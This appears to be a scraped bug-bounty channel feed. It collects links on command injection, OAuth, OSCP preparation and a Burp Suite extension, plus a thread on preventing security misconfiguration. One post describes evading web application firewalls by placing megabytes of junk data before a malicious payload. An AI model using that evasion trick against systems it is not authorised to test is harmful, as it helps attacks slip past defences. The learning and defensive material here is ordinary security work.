Requesting APIs using CUrl
Thread 🧵👇
https://twitter.com/Rapid_API/status/1619038188403658753?t=BjOLzFEXAD93lYKr8uw4mA&s=19
Thread 🧵👇
https://twitter.com/Rapid_API/status/1619038188403658753?t=BjOLzFEXAD93lYKr8uw4mA&s=19
👍9❤2
Vulnexp 90 | Day12
OS command injection
https://twitter.com/AnukulHexx/status/1619283322575912967?s=20&t=Vkiojbslm9NC6SYllP1ptA
OS command injection
https://twitter.com/AnukulHexx/status/1619283322575912967?s=20&t=Vkiojbslm9NC6SYllP1ptA
👍5❤1
#bugbountytips Having trouble with a WAF? For POST/PUT/PATCH requests, try inserting a useless parameter with between 8KB to 10MB of random data BEFORE your malicious payload.
Many WAFs stop processing after X payload characters, allowing anything AFTER that through the WAF
use this website frequently to generate the easy to insert payloads (copy and paste):
https://onlinefiletools.com/generate-random-text-file
Credit : ZwinK
Many WAFs stop processing after X payload characters, allowing anything AFTER that through the WAF
use this website frequently to generate the easy to insert payloads (copy and paste):
https://onlinefiletools.com/generate-random-text-file
Credit : ZwinK
❤14👍4
Chat Gpt For Hacking ~ Anugrah
https://anugrahsr.in/chatgpt-for-hacking_talk/
#bugbounty #infosec #bugbountytips #cybersecurity
https://anugrahsr.in/chatgpt-for-hacking_talk/
#bugbounty #infosec #bugbountytips #cybersecurity
❤9
Web3 Decoder is a Burp Suite Extension that allows to decode "web3" JSON-RPC calls that interact with smart contracts in an EVM blockchain.
https://github.com/nccgroup/web3-decoder
#bugbounty #web3 #bugbountytips #infosec #cybersercurity
https://github.com/nccgroup/web3-decoder
#bugbounty #web3 #bugbountytips #infosec #cybersercurity
❤9👍1
OSCP Preparation With Active Directory 👨💻
https://bugbountyguide.org/2022/11/29/oscp-preparation-with-active-directory/
https://bugbountyguide.org/2022/11/29/oscp-preparation-with-active-directory/
❤16👍3
Vulnexp 90 | Day18
OAuth 2.0 Pinpoints
➡️Writeups List:
➡️Top Reports:
Link: https://twitter.com/AnukulHexx/status/1621418176117633027?s=20&t=MRDGJzRhVRI3Y6PkaDI2rQ
OAuth 2.0 Pinpoints
➡️Writeups List:
➡️Top Reports:
Link: https://twitter.com/AnukulHexx/status/1621418176117633027?s=20&t=MRDGJzRhVRI3Y6PkaDI2rQ
🔥3
~ OSCP Resouces ⛵👇
All Networking Services & Ports Enumeration
https://bugbountyguide.org/2022/12/24/all-network-services-ports-enumeration/
All Networking Services & Ports Enumeration
https://bugbountyguide.org/2022/12/24/all-network-services-ports-enumeration/
❤10👍4
⚡ Security Misconfiguration 🌻
One of the top causes of website and application vulnerabilities.
It occurs when systems are not properly configured, leaving them open to attack.
Thread ( 1/10 ) : 🧵👇
(2/10)
💻 Security Misconfiguration Occurance:
• Inadequate security hardening & improper configs in app stack/cloud services
• Enabled unnecessary features/ports/services/accounts/privileges
• Default accounts with unchanged passwords
• Error handling revealing sensitive info
3/10
• Unsecured upgrades & disabled security features
• Insecure values in app servers, frameworks, libraries, & databases
• Insufficient security headers or directives
• Outdated & vulnerable software
• Regular security assessments can help prevent misconfigurations.
4/10
🤒The consequences of misconfiguration can be serious, including data theft, system takeover, and disruption of service.
5/10
🔎 To prevent misconfiguration, it's important to follow best practices and guidelines:
• Establish a repeatable hardening process for fast secure environment deployment
• Configure dev, QA, & prod environments identically with unique credentials
6/10
• Automate the process for minimal effort
• Minimize the platform with no unused features, components, or docs
• Review & update configs for all security notes & patches as part of patch management
• Review cloud storage permissions
7/10
• Implement segmented app architecture with effective separation between components/tenants
• Send security directives (e.g. Security Headers) to clients
• Automate the process to verify configs & settings in all environments.
8/10
💡 Regular security assessments and vulnerability scans can also help identify misconfigurations and other vulnerabilities in your systems.
9/10
🔐 In conclusion, security misconfiguration is a common and serious issue that can be easily prevented with proper planning and attention to detail. Stay secure and protect your systems from attack!
10/10
References 📃👇:
• https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/README
• https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/01-Testing_For_Improper_Error_Handling
•https://github.com/OWASP/ASVS/blob/master/4.0/en/0x22-V14-Config.md
• https://csrc.nist.gov/publications/detail/sp/800-123/final
• https://cisecurity.org/cis-benchmarks/
• https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html
One of the top causes of website and application vulnerabilities.
It occurs when systems are not properly configured, leaving them open to attack.
Thread ( 1/10 ) : 🧵👇
(2/10)
💻 Security Misconfiguration Occurance:
• Inadequate security hardening & improper configs in app stack/cloud services
• Enabled unnecessary features/ports/services/accounts/privileges
• Default accounts with unchanged passwords
• Error handling revealing sensitive info
3/10
• Unsecured upgrades & disabled security features
• Insecure values in app servers, frameworks, libraries, & databases
• Insufficient security headers or directives
• Outdated & vulnerable software
• Regular security assessments can help prevent misconfigurations.
4/10
🤒The consequences of misconfiguration can be serious, including data theft, system takeover, and disruption of service.
5/10
🔎 To prevent misconfiguration, it's important to follow best practices and guidelines:
• Establish a repeatable hardening process for fast secure environment deployment
• Configure dev, QA, & prod environments identically with unique credentials
6/10
• Automate the process for minimal effort
• Minimize the platform with no unused features, components, or docs
• Review & update configs for all security notes & patches as part of patch management
• Review cloud storage permissions
7/10
• Implement segmented app architecture with effective separation between components/tenants
• Send security directives (e.g. Security Headers) to clients
• Automate the process to verify configs & settings in all environments.
8/10
💡 Regular security assessments and vulnerability scans can also help identify misconfigurations and other vulnerabilities in your systems.
9/10
🔐 In conclusion, security misconfiguration is a common and serious issue that can be easily prevented with proper planning and attention to detail. Stay secure and protect your systems from attack!
10/10
References 📃👇:
• https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/README
• https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/01-Testing_For_Improper_Error_Handling
•https://github.com/OWASP/ASVS/blob/master/4.0/en/0x22-V14-Config.md
• https://csrc.nist.gov/publications/detail/sp/800-123/final
• https://cisecurity.org/cis-benchmarks/
• https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html
👍8🔥3❤1